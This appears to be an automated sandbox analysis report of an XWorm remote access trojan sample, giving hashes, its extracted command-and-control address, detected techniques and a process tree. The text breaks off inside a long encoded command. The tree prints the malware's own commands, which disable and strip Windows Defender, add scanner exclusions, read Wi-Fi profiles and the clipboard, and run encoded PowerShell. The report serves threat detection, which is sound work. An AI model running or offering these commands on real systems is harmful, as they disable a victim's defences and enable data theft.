xworm | d80f9618ef8369e54986f2abf564e5eeccf961d3ddaca515622412b1e4648d4c

Resubmissions

20-04-2024 17:13

240420-vrrwwadh2z 10

12-03-2024 21:36

10-03-2024 04:41

10-03-2024 04:40

10-03-2024 04:38

09-03-2024 07:38

Analysis

max time kernel
5s
max time network
10s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
10-03-2024 04:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Reaper/Reaper/Reaper.exe
Size

8.3MB
MD5

79d145e3962e71bf725d15b4c0261dac
SHA1

bc9d7a5a347fcefe3b3b81136e83af294bd489f4
SHA256

0ca306be254d1b3aff02ae559e5649e9f0bb10367f692e132d7da39e6860448d
SHA512

2fc3cd1b4542de7313ffea8fc16132df9c305c9ca847d4754e3a645c274933b4dd9682b4dd2585c62e5b8b2307e296fb64e32b758222123bb5c901a95ba0b6df
SSDEEP

196608:wfojS3EHCg1OgwII+XN6h5BOpEAyRHtt7fEiLrArrIx2j1:wojS3E1zg+XN05UpEAcHtt7MiorGg

Score

10^/10

xworm rat spyware stealer trojan upx

Malware Config

Extracted

Family

xworm

l838.ddns.net:3232

Attributes

Install_directory
%AppData%
install_file
Runtime Broker.exe

Signatures

Detect Xworm Payload 3 IoCs

Processes:

resource	yara_rule
C:\Windows\Runtime broker.exe	family_xworm
behavioral3/memory/4132-52-0x0000000003110000-0x0000000003120000-memory.dmp	family_xworm
behavioral3/memory/4408-42-0x0000000000E70000-0x0000000000E8A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Executes dropped EXE 4 IoCs

Processes:

Reaper.exeRuntime broker.exeWindows Defender Smartscreen.exeWindows Defender Smartscreen.exe

pid process

1000 Reaper.exe
4408 Runtime broker.exe
3512 Windows Defender Smartscreen.exe
4264 Windows Defender Smartscreen.exe

Loads dropped DLL 20 IoCs

Processes:

Reaper.exeWindows Defender Smartscreen.exe

pid	process
1000	Reaper.exe
1000	Reaper.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe
4264	Windows Defender Smartscreen.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 37 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libffi-8.dll	upx
behavioral3/memory/4264-139-0x00007FFBDE3D0000-0x00007FFBDE3DF000-memory.dmp	upx
behavioral3/memory/4264-137-0x00007FFBD4E50000-0x00007FFBD4E73000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_ctypes.pyd	upx
behavioral3/memory/4264-130-0x00007FFBBF1B0000-0x00007FFBBF799000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\python311.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\python311.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_lzma.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libssl-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libcrypto-1_1.dll	upx
behavioral3/memory/4264-166-0x00007FFBDA190000-0x00007FFBDA19D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_hashlib.pyd	upx
behavioral3/memory/4264-172-0x00007FFBC9280000-0x00007FFBC9338000-memory.dmp	upx
behavioral3/memory/4264-180-0x00007FFBD5000000-0x00007FFBD5019000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\unicodedata.pyd	upx
behavioral3/memory/4264-182-0x00007FFBD4AF0000-0x00007FFBD4B13000-memory.dmp	upx
behavioral3/memory/4264-183-0x00007FFBD4AC0000-0x00007FFBD4AD9000-memory.dmp	upx
behavioral3/memory/4264-185-0x00007FFBD4DC0000-0x00007FFBD4DCD000-memory.dmp	upx
behavioral3/memory/4264-186-0x00007FFBBEB90000-0x00007FFBBECAC000-memory.dmp	upx
behavioral3/memory/4264-184-0x00007FFBD4270000-0x00007FFBD4284000-memory.dmp	upx
behavioral3/memory/4264-177-0x00007FFBBECB0000-0x00007FFBBF028000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_queue.pyd	upx
behavioral3/memory/4264-167-0x00007FFBD4290000-0x00007FFBD42BE000-memory.dmp	upx
behavioral3/memory/4264-165-0x00007FFBBF030000-0x00007FFBBF1A7000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\libcrypto-1_1.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_ssl.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\select.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_socket.pyd	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\sqlite3.dll	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_sqlite3.pyd	upx
behavioral3/memory/4264-149-0x00007FFBD4B20000-0x00007FFBD4B4D000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\_MEI35122\_bz2.pyd	upx
behavioral3/memory/4264-244-0x00007FFBBF1B0000-0x00007FFBBF799000-memory.dmp	upx
behavioral3/memory/4264-450-0x00007FFBBF1B0000-0x00007FFBBF799000-memory.dmp	upx
behavioral3/memory/4264-451-0x00007FFBD4E50000-0x00007FFBD4E73000-memory.dmp	upx
behavioral3/memory/4264-464-0x00007FFBBF030000-0x00007FFBBF1A7000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Drops file in Windows directory 1 IoCs

Processes:

Reaper.exe

description ioc process

File created C:\Windows\Runtime broker.exe Reaper.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2668 schtasks.exe
Enumerates processes with tasklist 1 TTPs 4 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exe

pid process

3784 tasklist.exe
3884 tasklist.exe
4424 tasklist.exe
2792 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

848 systeminfo.exe

flow	ioc
1	ip-api.com

description	ioc	process
File created	C:\Windows\Runtime broker.exe	Reaper.exe

pid	process
2668	schtasks.exe

pid	process
3784	tasklist.exe
3884	tasklist.exe
4424	tasklist.exe
2792	tasklist.exe

pid	process
848	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4132	powershell.exe
4132	powershell.exe
3136	powershell.exe
3136	powershell.exe
764	powershell.exe
764	powershell.exe
2024	powershell.exe
2024	powershell.exe
2024	powershell.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

Runtime broker.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exetasklist.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4408	Runtime broker.exe
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	2024	powershell.exe
Token: SeDebugPrivilege	3784	tasklist.exe
Token: SeDebugPrivilege	3884	tasklist.exe
Token: SeIncreaseQuotaPrivilege	4184	WMIC.exe
Token: SeSecurityPrivilege	4184	WMIC.exe
Token: SeTakeOwnershipPrivilege	4184	WMIC.exe
Token: SeLoadDriverPrivilege	4184	WMIC.exe
Token: SeSystemProfilePrivilege	4184	WMIC.exe
Token: SeSystemtimePrivilege	4184	WMIC.exe
Token: SeProfSingleProcessPrivilege	4184	WMIC.exe
Token: SeIncBasePriorityPrivilege	4184	WMIC.exe
Token: SeCreatePagefilePrivilege	4184	WMIC.exe
Token: SeBackupPrivilege	4184	WMIC.exe
Token: SeRestorePrivilege	4184	WMIC.exe
Token: SeShutdownPrivilege	4184	WMIC.exe
Token: SeDebugPrivilege	4184	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4184	WMIC.exe
Token: SeRemoteShutdownPrivilege	4184	WMIC.exe
Token: SeUndockPrivilege	4184	WMIC.exe
Token: SeManageVolumePrivilege	4184	WMIC.exe
Token: 33	4184	WMIC.exe
Token: 34	4184	WMIC.exe
Token: 35	4184	WMIC.exe
Token: 36	4184	WMIC.exe

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

Reaper.exeWindows Defender Smartscreen.exeWindows Defender Smartscreen.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3488 wrote to memory of 4132	3488	Reaper.exe	powershell.exe
PID 3488 wrote to memory of 4132	3488	Reaper.exe	powershell.exe
PID 3488 wrote to memory of 4132	3488	Reaper.exe	powershell.exe
PID 3488 wrote to memory of 1000	3488	Reaper.exe	Reaper.exe
PID 3488 wrote to memory of 1000	3488	Reaper.exe	Reaper.exe
PID 3488 wrote to memory of 1000	3488	Reaper.exe	Reaper.exe
PID 3488 wrote to memory of 3512	3488	Reaper.exe	Windows Defender Smartscreen.exe
PID 3488 wrote to memory of 3512	3488	Reaper.exe	Windows Defender Smartscreen.exe
PID 3488 wrote to memory of 4408	3488	Reaper.exe	Runtime broker.exe
PID 3488 wrote to memory of 4408	3488	Reaper.exe	Runtime broker.exe
PID 3512 wrote to memory of 4264	3512	Windows Defender Smartscreen.exe	Windows Defender Smartscreen.exe
PID 3512 wrote to memory of 4264	3512	Windows Defender Smartscreen.exe	Windows Defender Smartscreen.exe
PID 4264 wrote to memory of 1488	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 1488	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 396	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 396	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 1876	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 1876	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 396 wrote to memory of 3136	396	cmd.exe	powershell.exe
PID 396 wrote to memory of 3136	396	cmd.exe	powershell.exe
PID 1876 wrote to memory of 764	1876	cmd.exe	powershell.exe
PID 1876 wrote to memory of 764	1876	cmd.exe	powershell.exe
PID 4264 wrote to memory of 3668	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 3668	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 4860	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 4860	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 1488 wrote to memory of 2024	1488	cmd.exe	powershell.exe
PID 1488 wrote to memory of 2024	1488	cmd.exe	powershell.exe
PID 4264 wrote to memory of 3580	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 3580	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 5076	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 5076	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 3668 wrote to memory of 3784	3668	cmd.exe	tasklist.exe
PID 3668 wrote to memory of 3784	3668	cmd.exe	tasklist.exe
PID 4264 wrote to memory of 4504	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 4504	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 3552	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 3552	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 4724	4264	Windows Defender Smartscreen.exe	tree.com
PID 4264 wrote to memory of 4724	4264	Windows Defender Smartscreen.exe	tree.com
PID 4264 wrote to memory of 1512	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 1512	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 772	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 772	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4860 wrote to memory of 3884	4860	cmd.exe	tasklist.exe
PID 4860 wrote to memory of 3884	4860	cmd.exe	tasklist.exe
PID 4264 wrote to memory of 4828	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 4264 wrote to memory of 4828	4264	Windows Defender Smartscreen.exe	cmd.exe
PID 3580 wrote to memory of 4184	3580	cmd.exe	WMIC.exe
PID 3580 wrote to memory of 4184	3580	cmd.exe	WMIC.exe
PID 4724 wrote to memory of 3632	4724	cmd.exe	Conhost.exe
PID 4724 wrote to memory of 3632	4724	cmd.exe	Conhost.exe
PID 5076 wrote to memory of 4052	5076	cmd.exe	powershell.exe
PID 5076 wrote to memory of 4052	5076	cmd.exe	powershell.exe
PID 3552 wrote to memory of 1032	3552	cmd.exe	netsh.exe
PID 3552 wrote to memory of 1032	3552	cmd.exe	netsh.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exe

pid process

5656 attrib.exe
6004 attrib.exe

pid	process
5656	attrib.exe
6004	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper\Reaper\Reaper.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3488

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAdwBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AYwB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHMAbABqACMAPgA="
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Users\Admin\AppData\Local\Temp\Reaper.exe
"C:\Users\Admin\AppData\Local\Temp\Reaper.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1000

C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3512

C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe
"C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'"
4⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows Defender Smartscreen.exe'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
4⤵
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
4⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:3668

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3784

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
4⤵
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
4⤵
- Suspicious use of WriteProcessMemory
PID:5076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
5⤵
PID:4052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
4⤵
PID:4504

C:\Windows\system32\tasklist.exe
tasklist /FO LIST
5⤵
- Enumerates processes with tasklist
PID:4424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
- Suspicious use of WriteProcessMemory
PID:4724

C:\Windows\system32\tree.com
tree /A /F
5⤵
PID:3632

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
4⤵
- Suspicious use of WriteProcessMemory
PID:3552

C:\Windows\system32\netsh.exe
netsh wlan show profile
5⤵
PID:1032

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
4⤵
PID:1512

C:\Windows\system32\systeminfo.exe
systeminfo
5⤵
- Gathers system information
PID:848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
4⤵
PID:772

C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
5⤵
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
4⤵
PID:4828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAb